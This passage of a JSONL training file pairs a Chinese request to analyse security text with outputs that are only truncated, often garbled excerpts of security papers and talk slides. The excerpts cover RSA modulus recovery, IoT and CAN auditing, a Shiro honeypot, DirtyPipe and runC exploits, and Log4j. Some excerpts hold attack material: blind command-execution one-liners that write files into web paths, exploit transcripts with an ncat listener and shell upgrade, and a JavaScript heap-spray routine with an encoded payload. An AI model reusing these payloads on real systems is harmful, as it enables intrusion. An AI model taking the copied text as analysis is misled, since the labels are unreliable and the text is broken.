`((A2)e mod N)` we'll get plain `k*N`. However, we don't control the payload so much, it has the prefix! ## Modulus recovery The idea for modulus recovery is just as above - we want to get from the server a pair of different ciphertexts which `mod N` would have the same value. Subtracting them will yield `k*N`. We are going to leverage homomorphic property of textbook RSA: ``` Ae mod N * Be mod N = (A*B)e mod N ``` Let's assume we have 4 different values such that: `A*B = C*D` and each of those values is a valid plaintext with the appropriate prefix. If we encrypt those values separately with textbook RSA and combine them the property will still hold, so: ``` (Ae mod N * Be mod N) mod N = (A*B)e mod N (Ce mod N * De mod N) mod N = (C*D)e mod N and since A*B = C*D then (A*B)e mod N == (C*D)e mod N ``` However, the values `(Ae mod N) * (Be mod N)` and `(Ce mod N) * (De mod N)` without ap", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAuditing 6LoWPAN Networks Using Standard Penetration Testing Tools Adam Reziouk Airbus Defence and Space adam.reziouk@airbus.com Arnaud Lebrun Airbus Defence and Space arnaud.lebrun@airbus.com Jonathan-Christofer Demay Airbus Defence and Space jcdemay@airbus.com ABSTRACT The Internet of Things is expected to be involved in the near future in all major aspects of our modern society. On that front, we argue that 6LoWPAN is a protocol that will be a dominant player as it is the only IoT-capable protocol that brings a full IP stack to the smallest devices. As evidence of this, we can highlight the fact that even the latest ZigBee Smart Energy standard is based on ZigBee IP which itself relies on 6LoWPAN, a competitor of the initial ZigBee protocol. Efficient IP-based penetration testing tools have been available to security auditors for years now. However, it is not that easy to use them in the context of a 6LoWPAN network since you need to be able to join it first. In fact, the difficult part is to associate with the underlying IEEE 802.15.4 infrastructure. Indeed, this standard already has two iterations since its release in 2003 and it provides with several possibilities regarding network topology, data transfer model and security suite. Unfortunately, there is no off-the-shelf component that provides, out of the box, with such a wide range of capabilities. Worst still, some of them deviate from the standard and can only communicate with components from the same manufacturer. In this paper, we present the ARSEN project: Advanced Routing for 6LoWPAN and Ethernet Networks. It provides security auditors with two new tools. First, a radio scanner that is capable of identifying IEEE 802.15.4 networks and their specificities, including several deviations from the standard that we encountered in actual security audits. Secondly, a border router capable of routing IPv6 frames between Ethernet and 6LoWPAN networks while adapting to the specificities identified by the scanner.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThis document and its content is the property of Airbus Defence and Space. It shall not be communicated to any third party without the owners written consent. All rights reserved. CANSPY a Platform for Auditing CAN Devices Arnaud Lebrun Jonathan-Christofer Demay 2 Arnaud Lebrun Jonathan-Christofer Demay CANSPY a Platform for Auditing CAN Devices Auditing conventional IT systems  Penetration testing  A form of security audit  Assess the risks of intrusion  Actual tests instead of a review process  The point of view of a real attacker (the black-box approach)  Relevant evaluation of impact and exploitability  Limitations  Less time  Less resources  More ethics  Counter-measure: the grey-box approach 3 Arnaud Lebrun Jonathan-Christofer Demay CANSPY a Platform for Auditing CAN Devices The CISOs dilemma  The hand they are dealt with  Huge scope of responsibility  Continuous changes  Major security threats  Risk of substantial damages  Limited budget  Their response  They rely on penetration testing  They welcome the gray-box approach  They rely on risk analysis first and foremost  They divide perimeters accordingly 4 Arnaud Lebrun Jonathan-Christofer Demay CANSPY a Platform for Auditing CAN Devices What about car manufacturer ?  They are starting to include cyber-security along with conventional safety  A lot of new functionalities  Using more complex software  Also, security researchers 5 Arnaud Lebrun Jonathan-Christofer Demay CANSPY a Platform for Auditing CAN Devices What about car manufacturer ?  They are starting to include cyber-security along with conventional safety 6 Arnaud Lebrun Jonathan-Christofer Demay CANSPY a Platform for Auditing CAN Devices What about car manufacturer ?  They are starting to include cyber-security along with conventional safety 7 Arnaud Lebrun Jonathan-Christofer Demay CANSPY a Platform for Auditing CAN Devices What about car manufacturer ?  They are starting to include cyber-security along with conventional safety 8 Arnaud Lebrun Jonat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn Excerpt from the iDefense 2011 Cyber Threats and Trends Report Dec. 1, 2010 The Verisign iDefense Intelligence Operations Team Contents 1 Technology Trends 3 1.1 Malicious Code Trends 3 1.1.1 Anti-analysis Tactics Become More Restrictive 3 1.1.2 Mobile Malware 4 1.1.3 Malware and 64-bit Platforms 5 1.1.4 Low-Distribution (APT) Malware Hiding in Plain Sight 6 1.2 Vulnerability Trends 7 1.2.1 Increase in Out-of-Band Patches from Notable Software Vendors 7 1.2.2 Changing Vulnerability Disclosure Landscape 9 1.2.3 Vendor Bounty Programs 10 1.2.3.1 Mozilla Security Bug Bounty Program 10 1.2.3.2 Google Security Bug Bounty Program 11 2 Disruptors 13 2.1 Introduction 13 2.2 Disruptor: Convergence of the App Store Model and Traditional Computing 15 2.3 Disruptor: The Vulnerable Cloud 18 2.4 Disruptors Conclusion 21 3 Disruptors 1 Technology Trends 1.1 Malicious Code Trends 1.1.1 Anti-analysis Tactics Become More Restrictive In 2010, iDefense observed more malware samples that included anti-analysis tactics. Malware authors use anti-analysis techniques to frustrate individuals attempting to analyze their code. The tactics that iDefense observed during 2010 included virtual machine (VM) detection, sandbox detection and hardware-locking mechanisms. The VM and sandbox-detection anti-analysis techniques are by no means a new concept. Many malware families check the environment for artifacts of analysis systems, such as VM hard drive drivers and VM processes. In addition, iDefense observed an increase in malware families that incorporate VM-detection techniques. For example, when iDefense first analyzed the Mariposa Trojan (BFBot) in 2009,1 it only checked for artifacts related to a sandbox environment and if the Trojan was operating within a debugger. In July 2010, iDefense analyzed a Mariposa sample that also checked for video card drivers related to virtual machines. The addition of new checks suggests that malware authors see the benefits of including VM detection in their ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n开发shiro蜜罐遇到的一些问题 2022年09月14日 / 网络安全 前情概要 我曾经写过一篇文章https://rce.ink/index/view/366.go 大概意思就是php的网站模拟shiro工具探测的过程配合响应实现可以根据指定key让工 具实现逼真的测试效果,如图所示 这样攻击者会觉得网站是shiro框架并且被我爆破出了一个key再配合修改phpsessio nid为jsessionid脚本伪静态修改后缀为jsp达到更好的效果 我的博客是由webman开发纯纯php框架 后续开发 上次写到那里我就去做更有意思的项目了直到最近我才开始对指定利用链检测命令回 显等功能进行完善 我写了一堆php代码来配合攻击者使用工具进行利用链测试的场景大概可以实现下面的 效果 攻击者发现可以使用这个cc链进行攻击的时候肯定会进行命令执行那么我也只需要写 脚本来配合他的一些场景给响应的回显即可在这里具体针对一下j1anfen师傅开发的shir o-attack工具我们反编译工具中的AttackService.class代码如下 通过设置序列化的恶意attackRememberMe到cookie对用户输入命令进行base64编 码放入请求头取响应包body中的内容进行字符串$$$分割,然后取第二组数据也就是响 应结果在进行base64解码拿到命令回显 写一个配合实现的脚本也就是获取到header c的时候根据命令回显虚假的命令执行结 果但是执行命令的时候抛出下标越界的错误也就是响应包不是类似$$$data$$$的字符 串 工具可以设置代理为了看具体请求是怎么样的我挂了一个burpsuite代理抓到请求 包后发包结果响应是正常的 没办法 只能对jar包打断点使用idea jvm remote debug 的方法对工具反编译后带 参数运行 在 String responseText = this.bodyHttpRequest(header, \"\"); 处打一个断点这样 我们能看到没挂代理的时候请求类返回结果是什么 然后发送命令执行的指令在代理请求下正常 在关闭代理的情况下 数据变成的乱码 让我非常疑惑 使用自己写的工具浏览器访问都正 常 就工具不正常 一开始实在没想明白 一直觉得是工具有问题 但是转过头想那为啥其他有漏洞的网站可以测 试呢所以显然是自己的网站有问题 我不断观察响应包 发现一个header 捏吗 这不是gzip压缩的标头么 看了下数据貌似是被压缩了 这我才想到 我特么网站用的是 nginx啊 java -Xdebug -Xrunjdwp:transport=dt_socket,address=5005,server=y,suspen -jar /Users/depy/desktop/1.jar 很好 果然是开了 把on改成off 标头就消失了 中间件此时不会对数据进行压缩 然后就可以正常执行命令了 这样我们可以愉快的构造一些虚假的命令执行结果继续浪费攻击者的时间 让他对着php一 顿shiro反序列化了 似乎拿下了网站 似乎又没拿下 原因 1.burpsuite等支持自动对响应做gzip解压缩 2.工具使用的请求类URLConnection不支持自动做gzip解压或者版本太低我使用自己j ava工具测试的时候是正常的看了下我用的是httpurlconnection 所以使用j1anfen师傅summersec师傅的工具的时候 建议直接挂burpsuite代理 防 止遇到gzip解压的问题让你觉得是命令执行没有回显 后续 demo例子很简单只是简单的根据工具给的参数然后给出相应的headerset或者是回显 即可这样的问题就是如果有多种shiro探测工具探测利用链和回显以及命令执行的方式 是多种多样的我的思路是提取工具序列化数据里的字节码那么可以通过ASM去分析字 节码再通过一些逻辑与指令去做相应的操作 不过回到一开始的想法好用的测试工具只有那么几个目的是为了消耗攻击者的时间 所以只需要把特征都保存下来设置一遍基本也可以实现想要的结果很简单的实验师 傅们轻喷呜呜", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacking Biometric Access Control Systems By: Zamboni Outline Overview of biometrics General methodology used to attack biometric systems Example attacks against physical access control systems Defenses Question Biometrics Unique and (relatively) permanent physical or behavioral characteristic that can be used to identify or authenticate a user Examples: Finger prints Hand geometry Vascular patterns Retina Iris Voice pattern Advantages Unique Part of the user Very hard to forgot or lose Can provide reliable authentication Disadvantages & Problems Cannot be kept secret Some can be copied or stolen Cannot be reset or revoked Make insecure cryptographic keys Common across multiple systems/organizations System accuracy is dependent on enrollment verification System can be manipulated if more than one person has access to the reader or resource Basic Biometric Process 1. Collection at the Biometric Sensor: System captures physical or behavioral characteristic 2. Feature Extraction: Template is created 3. Comparison: New template is compared with stored templates to produce a matching score 4. Result: System returns a match or non- match result Basic Biometric Process Identification vs. Authentication Identification tells who someone is Authentication verifies that someone is who he/she claims to be Types of authentication: Something you know Something you have Something you are Template Verification Identification One-to-many search Does the system recognize you? Steps: 1) User presents a characteristic to the system 2) User template is compared to each template in the database for a match Authentication (Verification or positive matching) One-to-one search Are you who you claim to be? Steps: 1) User provides user name, PIN or other form of identification 2) User presents a characteristic to the system 3) User template is only compared to template associated with that specific user Template Matching Matching is approximate Problems with this Can not give a categorical y", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMedical Identity Theft updated slides available at www.pskl.us Eric Smith Bucknell University Dr. Shana Dardan Susquehanna University Because of the difficulty in detection, the potential exists for this crime to be happening substantially more frequently than anyone has documented to date... World Privacy Forum, Spring 2006 US Health Care Costs as a Ratio of the GDP: 1997: 13.0% 2002: 14.6% 2006: 16.3% 2017: 20.0% [Forecast] -Washington Post, 2008 Background of the Problem 0% 5% 10% 15% 20% 25% 1995 2000 2005 2010 2015 2020 Craig Barrett, then-CEO of Intel noted in 2006 that health care costs were a driving factor in Intels decision to pursue operations overseas. Who is paying for this? Businesses Governments Ultimately  the consumer Cutting Costs Transmit them across a private network Patients records can be shared easily among doctors and other health care providers - HIT Report at a Glance, U.S. Department of Health and Human Services Press Release, 7/21/04 Digitize patient medical records Cutting Costs Reduction in medical errors - Conversations with Sutter Health, 2008 Increased efficiency Sutter Health: 88,000 medical errors prevented in first three years Better communication, especially between health care providers Costs of Medical Errors - The Quality of Health Care Delivered to Adults in the United States, New England Journal of Medicine; June 2003 ~$17 to $29 billion per year Costs of Medical Errors - To Err is Human: Building a Safer Health System; Institute of Medicine, 2000, pg 26 98,000 deaths per year The very comprehensive and ubiquitous nature of the NHIN that makes it attractive also makes it a source of concern. If digitized medical records can move throughout a nationwide system easily and quickly, then that means that incorrect files, factual data, etc. will also move easily and quickly between every doctor and hospital. The NHIN: National Health Information Network - Dixon, 2006 Certain kinds of fraud  such as falsification of medical records", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows命令执获取web路径 在某些情况下存在Windows命令执但是不出也没有回显 但是需要获取个web绝对路径可以通过这个路径配合其他漏洞拿webshell也 可以把命令执结果写到web路径下进访问相当于回显 在Win中可以通过以下法获得 想直接看结论的跳转到 总结 即可 些坑 这借鉴了520师傅的命令 https://sec.lz520520.com/2021/01/596/ 这去掉了cmd /c的时候再加上也是可以的 for /f %i in ('dir /s /b C:\\Users\\46479\\qqqq.txt') do (echo %i) 1 但是发现不持有空格的路径 改进下脚本 加了\"delims=***\"原理就是指定***\\为分割符号不是以空格为分割符 把该路径写到新件的命令结合起来就是 for /f \"delims=***\" %i in ('dir /s /b C:\\Users\\46479\\qqqq.txt') do (echo %i)` 1 for /f \"delims=***\" %i in ('dir /s /b C:\\Users\\46479\\qqqq.txt') do (echo %i>%i.jsp) 1 绝对路径写到qqqq.txt.jsp成功 根据实际情况更改后缀让web可以直接访问到 我以为就这样就结束了没想到这个命令在批处理下运是有坑的法运 经过摸索后才发现该命令在批处理下还需要做些改变具体规则如下 * 第批处理中单字符变量的引使要把%改为%% * 第, 要将命令的执结果作为循环体反引号``不是单引号'' * 第三使反引号情况下, /F选项要加上 usebackq参数 转换后的命令如下 for /f \"usebackq delims=***\" %%i in (`DIR /s /b D:\\User\\46479\\qqqq.txt`) do (echo %%i>%%i.txt) 1 这样就可以在批处理下执成功了 总结 Windows命令执不出不回显在某些特殊情况需要获取web的绝对路径 如果是直接在cmd中执 如果是在个批处理脚本中执命令需要改为 以上命令意思就是在D盘下搜索login.jsp件把搜到的件以添加.txt后缀形 式创建个新的件在当前搜到的录 例如在 D:\\web\\login.jsp 发现了该login.jsp件那么就会创建 D:\\web\\login.jsp.txt 件件内容就是 D:\\web\\login.jsp  以上的后缀路径可以根据实际情况进更改 for /f \"delims=***\" %i in ('dir /s /b D:\\login.jsp') do (echo %i>%i.txt) 1 for /f \"usebackq delims=***\" %%i in (`DIR /s /b D:\\login.jsp`) do (echo %%i>%%i.txt) 1 贴个实战成功的截图", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhttps://www.comp.nus.edu.sg/programmes/pg/misc/ Ø GitHub:brant-ruan Ø Blog:blog.wohin.me Ø 5G Ø 盟 Ø Ø Metarget AboutMe CONTENTS 01 02 04 DirtyPipe CVE-2019-5736 03 05 runC src: https://containerd.io/img/architecture.png 故事要从DirtyPipe讲起 01 DirtyPipe (CVE-2022-0847) TheDirtyPipeVulnerability MaxKellermann max.kellermann@ionos.com Abstract ThisisthestoryofCVE-2022-0847,avulnerabilityintheLinuxkernel since5.8whichallowsoverwritingdatainarbitraryread-onlyfiles. Thisleadstoprivilegeescalationbecauseunprivilegedprocessescan injectcodeintorootprocesses. Itissimilarto CVE-2016-5195DirtyCow butiseasiertoexploit. Thevulnerability wasfixed inLinux5.16.11,5.15.25and5.10.102.  dpuname-r 5.8.0-050800rc1-generic  dpcat/etc/passwd|head-n1 root:x:0:0:root:/root:/usr/bin/zsh  dp./exploit/etc/passwd1hacked Itworked!  dpcat/etc/passwd|head-n1 rhacked0:0:root:/root:/usr/bin/zsh PoC/etc/passwd  ~dockerrundirtypipe:exp-1 [*]exploitingDirtyPipe (CVE-2022-0847) [+]runC openedforreadingas/proc/self/fd/3 [+]gotentrypoint:0x232390 [*]injectingpayloadintorunC atentrypoint 0x232390 [+]done shell  ~ncat -klvnp 4444 Ncat:Version7.60(https://nmap.org/ncat ) Ncat:Generatingatemporary1024-bitRSAkey. Ncat:Listeningon:::4444 Ncat:Listeningon0.0.0.0:4444 Ncat:Connectionfrom192.168.3.101. Ncat:Connectionfrom192.168.3.101:51995. exit Ncat:Connectionfrom192.168.3.101. Ncat:Connectionfrom192.168.3.101:51998. python3-c\"importpty;pty.spawn('/bin/bash')\" <08da5d2c57febb811f43f7ddf67a647d38c8e370d914ef6af# <08da5d2c57febb811f43f7ddf67a647d38c8e370d914ef6af#cd/ cd/ root@ubuntu-bionic:/# Ø runC Ø CVE-2019-5736 Ø runC... Ø runC Ø runC Ø 名噪一时的CVE-2019-5736 02 CVE-2019-5736 1 终端2 shell1%runc runctr shell2%runc execctrsh [thiswillblockfor500seconds]#sleep 500 shell1[ctr]#ps aux PIDUSERTIMECOMMAND 1root0:00sh 18 root0:00{runc:[2:INIT]}/proc/self/exeinit 24root0:00ps aux shell1[ctr]#ls/proc/18/fd -la total0 dr-x------ 2rootroot0Nov2814:29. dr-xr-xr-x9rootroot0Nov2814:29.. ... lr-x------ 1rootroot64Nov2814:294->/run/runc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUntrustworthy Hardware And How to Fix It PRESENT DAY. PRESENT TIME  - ##FPGA, ##crypto and #openRISC on Freenode - Shorne and Olofk from #openRISC (hardware and cross-compilation help) - PropellerGuy (Parallax Propeller open-source IO interface) - Briel Computers PockeTerm project - Maitimo, International Finance, DC408 Greetz: Thanks to Contributors: - core modern open source algorithms for strong cryptography have been heavy scrutinized, tested and are readily available - weak (DES, WEP, etc) and black box privacy tools are becoming a thing of the past - free and open source software has made it easier to trust the privacy of computer systems Layer:01 Software Lets assume the software (hypothetically) is 100% secure Where do we go from here? - firmware is almost exclusively closed source and controls almost all hardware devices and functions - due to their low-level nature, malicious firmware persists across OS reinstallations - (DEF CON 22: Summary of Attacks Against BIOS and Secure Boot) \"SPI flash is a really nice place if you can get there\" Layer:02 Firmware - hardware is almost always absolutely trusted by the rest of the system, as it is not widely considered an attack surface (especially in the consumer space) - NSA has been caught hardware backdooring Cisco systems (Glenn Greenwald, \"No Place to Hide\"), and DoD, Apple suspect adversarial nation states may be doing this as well - if the hardware is compromised, then the whole machine is compromised Layer:03 Hardware hardware backdooring is real I - Management Engine runs on a dedicated logic device within the processor and runs proprietary firmware and OS - Intel ME has full network device access with the ability to intercept network traffic without the CPUs knowledge - system access at the lowest level - remains functional in the background even if the system is shut down but remains on standby power Layer:04 Intel Management Engine Management Engine might sound like a feature reserved for enterprise or se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport re import os FILE_EXCLUDE_PATTERN = re.compile(r'[/\\\\]\\.(git|idea|vscode|pytest_cache)[/\\\\]') def is_textplain(data: bytes): return b'\\x00' not in data def test_content(): basedir = os.path.realpath(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')) for (now_dir, dirs, files) in os.walk(basedir): for name in files: filename = os.path.join(now_dir, name) if FILE_EXCLUDE_PATTERN.search(filename): continue with open(filename, 'rb') as f: data = f.read() if not is_textplain(data): continue assert b'\\r\\n' not in data, f'CRLF must be convert to LF for Vulhub files, but {filename} did not'", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGolang红队开发指南 目录 1 2 3 ProjectDiscovery Golang 植入端对抗方案 Golang C2 Sliver 1. 像Python一样简单代码可读性好 2. 简单的多架构交叉编译支持 3. 语法层面的并发支持 4. 易用的包管理 & 很多红队生态 前言 为什么是Go Par t1ProjectDiscover y 域名收集 Subfinder通过各种api接口被动收集子域名 Uncover整合各种网络空间引擎api接口 Dnsxdns验证 资产探测 Httpxweb信息探测 Naabu端口扫描 PoC NucleiPoc批量探测 通知 Notify整合第三方结果通知 ProjectDiscovery https://github.com/projectdiscovery HTTPXWeb信息探测 https://github.com/projectdiscovery/httpx Features HTTPXWeb信息探测 1. http/https探测逻辑 2. Autofdmax  github.com/projectdiscovery/fdmax 3. CdnCheck  github.com/projectdiscovery/cdncheck  整理CDN的ip段判断ip是否在这些ip段中 4. Retryablehttp  可重试http请求库  github.com/projectdiscovery/retryablehttp-go  github.com/projectdiscovery/fastdialer/fastdialer Tricks HTTPX 并发控制 github.com/projectdiscovery/httpx/blob/master/runner/runner.go#L670 Module: github.com/remeh/sizedwaitgroup Go常用并发控制  sync.WaitGroup  github.com/remeh/sizedwaitgroup  github.com/uber-go/ratelimit  Goroutine work pool 协程池 例子: 并发控制 Context.WithCancel生成一个可取消的 Context 例子WEB指纹识别 Naabu: 端口扫描器 https://github.com/projectdiscovery/naabu/blob/master/v2/go.mod 快速扫描的秘密  syn扫描基于系统socket发包libpcap接收  blackrock:随机化扫描算法 Golang with libpcap 静态编译 GOENABLE: 1 CGO_LDFLAGS: \"-Wl,-static -L/usr/lib/x86_64-linux-gnu/libpcap.a -lpcap -Wl,-Bdynamic\" 用途 DNS爆破(https://github.com/boy-hack/ksubdomain) Linux Port Knocking? Golang with libpcap Subfinder子域名被动搜索 https://github.com/projectdiscovery/subfinder 插件组织 Subfinder 集成 NucleiPoC探测 https://github.com/projectdiscovery/nuclei-templates https://github.com/projectdiscovery/nuclei Nuclei DSL github.com/Knetic/govaluate github.com/boy-hack/govaluate Nuclei其他 1. 请求合并  比较模板请求中的method最大重定向数是否共享cookie请求 是否重定向  比较请求的path  比较请求的header 2. 项目保存  projectfile是nuclei提供了可以保存项目的选项  内部实现是通过一个map保存了所有请求的包以及返回结果key 是对请求体(request struct)序列化后进行sha256运算 Nuclei 集成 github.com/projectdiscovery/nuclei/v2 v2.6.0 模板解析 Nuclei 集成 github.com/projectdiscovery/nuclei/v2 v2.6.0 模板执行 设计模式:Pipeline ProjectDiscovery 集成 Par t2Golang植入端对抗方案 Golang植入端对抗方案 植入端任何投递到目标环境的都叫植入端 预编译阶段 后处理", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNanika naninb@gmail.com 魔術 薩斯頓三原則  表演之前絕對不透漏接下來的表演內容  不在同一時間地點對相同的觀眾變同樣 的表演2次以上  表演過後絕不向觀眾透露表演的秘密 Windows 防護弱點機制 /GS SafeSEH DEP ASLR 突破 破解魔術手法 一般弱點利用 Fish 應用範圍 成功魔術的需求 手法 (弱點利用) Why Spraying  Not control precisely  Not control  Universal 12 NOP  NOP 0x0c0c0c0c OR AL,0C 0x0d0d0d0d 0d OR EAX,0D0D0D0D 0x0a0a0a0a OR CL,BYTE PTR DS:[EDX] 0x0b0b0b0b OR ECX,DWORD PTR DS:[EBX] 0x0c0b0c0b OR AL,0B 0x14141414 ADC AL,14 . 13 Not control precisely  esi=0x41414141  mov eax,esi  mov ecx,[eax]  call [ecx+0x8]  Offset 0x10 MEM 0x01140000 AAAAAAAAAAAAAAAA  Offset 0x20 MEM 0x01140010 BBBBBBBBBBBBBBBBB 14 0a 0b 0c 0d Not control  esi=0x0c374512 not control  mov eax,esi  mov ecx,[eax]//no access  call [ecx+0x8] 15 0x0c374512 0b 0c 0d 0b Universal 16  2000  Stack overflow  0x0013ffa0  0x0013ffbc//cookie  0x0013ffc0//ret  0x0013ffe0  0x0013fff0//seh  0x0014000//no access  XP  Stack overflow  0x0013ffac//cookie  0x0013ffb0//ret  0x0013ffc0  0x0013ffe0//seh  0x0013fff0  0x0014000//no access Classic javascript heap spraying var heapSprayToAddress = 0x12202020;//var payLoadCode = unescape(\"%uE8FC%u0044..); var heapBlockSize = 0x100000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape(\"%u0c0c%u0c0c\"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x10C000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) {memory[i] = spraySlide + payLoadCode;} function getSpraySlide(spraySlide, spraySlideSize) {while (spraySlide.length*2<spraySlideSize) {spraySlide += spraySlide;} spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } 17 JavaScript Encode  <html><body><button id=\"helloworld\" onclick=\"blkjbdkjb();\" STYLE=\"DISPLAY:NONE\"></button></script><script language=\"JavaScript\">var strtmp = String.fromCharCode(102,117,110,99,116,105,111,110,32,101,1 01,106,101,101,102,101,40,41,123,118,97,114,32,115,61,117,1 10,101,115,99,97,112,101,40,34,37,117,48,10", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.ig \\\"-*- nroff -*- Copyright (C) 1989-1999 Free Software Foundation, Inc. Permission is granted to make and distribute verbatim copies of this manual provided the copyright notice and this permission notice are preserved on all copies. Permission is granted to copy and distribute modified versions of this manual under the conditions for verbatim copying, provided that the entire resulting derived work is distributed under the terms of a permission notice identical to this one. Permission is granted to copy and distribute translations of this manual into another language, under the above conditions for modified versions, except that this permission notice may be included in translations approved by the Free Software Foundation instead of in the original English. .. .TH NROFF 1 \"28 December 1999\" \"Groff Version 1.15\" .SH NAME nroff \\- 用 groff 模拟 nroff 命令 .SH \"总览 (SYNOPSIS)\" .B nroff [ .B \\-h ] [ .B \\-i ] [ .BI \\-m name ] [ .BI \\-n num ] [ .BI \\-o list ] [ .BI \\-r cn ] [ .BI \\-T name ] [ .I file\\|.\\|.\\|. ] .SH \"描述 (DESCRIPTION)\" .B nroff 脚本用 groff 模拟 .B nroff 命令 .B \\-T 选项的参数除了 .B ascii 和 .B latin1 以外都将被忽略 .B \\-h 选项同 .B grotty .B \\-h 选项等价 .BR \\-i  .BR \\-n  .BR \\-m  .B \\-o 和 .B \\-r 选项同在 .BR troff (1) 中描述的作用是一样的 另外 .B nroff 忽略 .BR \\-e , .B \\-q 或者 .BR \\-s 选项 .B \\-S (安全) 和 .B \\-U (不安全) 选项被传给 groff 默认情况下 .B \\-S 被传给 groff .SH \"参见 (SEE ALSO)\" .BR groff (1) .BR troff (1) .BR grotty (1) .SH \"[中文版维护人]\" .B 唐友 <tony_ty@263.net> .SH \"[中文版最新更新]\" .BR 2001/8/28 .SH \"[中国Linux论坛man手册页翻译计划]\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVulnerable Out of the Box: An Evaluation of Android Carrier Devices Ryan Johnson - Kryptowire Angelos Stavrou - Kryptowire This work was supported by the Department of Homeland Security (DHS) Science and Technology (S&T) via award to the Critical Infrastructure Resilience Institute (CIRI) Center of Excellence (COE) led by the University of Illinois at Urbana-Champaign (UIUC). The views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or implied, of DHS. Why Look for Cyber Threats? Aggressive data collection  Exfiltration of sensitive user-data to China (Adups)  Sensitive data collection (OnePlus 5) Remote system compromise  System compromise from insecure network communications (Ragentek) User data disclosure due to vendor modifications  Samsung leaking log data (CVE-2017-7978)  MediaTek leaking log data (CVE-2016-10135) Local root privilege escalation  Alcatel A30 (former Amazon Prime Exclusive Device)  Leagoo P1  Privileged EngineerMode app (OnePlus 5)  Android 4.4 devices with a MediaTek chipset 2 Pre-installed Apps and Vendor OS Modification Android devices contain a set of pre-installed apps  May not be available on Google Play  Some apps cannot be disabled  Privileged platform apps Pre-installed apps can be malicious and/or insecure  Insecure apps can be locally or remotely exploited  Malicious apps can provide backdoor functionality and may exfiltrate sensitive user data Vendors generally modify Googles official Android code to provide custom behavior  (Un)intentionally expose sensitive capabilities 3 Source: https://developer.android.com/guide/platform/index.html App Components Fundamental functional blocks of an Android app  Activity  Broadcast Receiver  Service  Content Provider Declared in the apps manifest file May provide accessible entry-points into an app for other apps to exploit by using intents which are a message-like abstract", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLog4j2 JNDI author: flagT lookup:172, JndiManager (org.apache.logging.log4j.core.net) lookup:56, JndiLookup (org.apache.logging.log4j.core.lookup) lookup:223, Interpolator (org.apache.logging.log4j.core.lookup) resolveVariable:1116, StrSubstitutor (org.apache.logging.log4j.core.lookup) substitute:1038, StrSubstitutor (org.apache.logging.log4j.core.lookup) substitute:912, StrSubstitutor (org.apache.logging.log4j.core.lookup) replace:467, StrSubstitutor (org.apache.logging.log4j.core.lookup) format:132, MessagePatternConverter (org.apache.logging.log4j.core.pattern) format:38, PatternFormatter (org.apache.logging.log4j.core.pattern) toSerializable:345, PatternLayout$PatternSerializer (org.apache.logging.log4j.core.layout) toText:244, PatternLayout (org.apache.logging.log4j.core.layout) encode:229, PatternLayout (org.apache.logging.log4j.core.layout) encode:59, PatternLayout (org.apache.logging.log4j.core.layout) directEncodeEvent:197, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender) tryAppend:190, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender) append:181, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender) tryCallAppender:156, AppenderControl (org.apache.logging.log4j.core.config) callAppender0:129, AppenderControl (org.apache.logging.log4j.core.config) callAppenderPreventRecursion:120, AppenderControl (org.apache.logging.log4j.core.config) callAppender:84, AppenderControl (org.apache.logging.log4j.core.config) callAppenders:543, LoggerConfig (org.apache.logging.log4j.core.config) processLogEvent:502, LoggerConfig (org.apache.logging.log4j.core.config) log:485, LoggerConfig (org.apache.logging.log4j.core.config) log:460, LoggerConfig (org.apache.logging.log4j.core.config) log:82, AwaitCompletionReliabilityStrategy (org.apache.logging.log4j.core.config) log:161, Logger (org.apache.logging.log4j.core) tryLogMessage:2198, AbstractLogger (org.apache.logging.log4j.spi) logMessageTrackRecursion:2152, AbstractLogg", "category": "text_analysis", "source": "security_papers"}
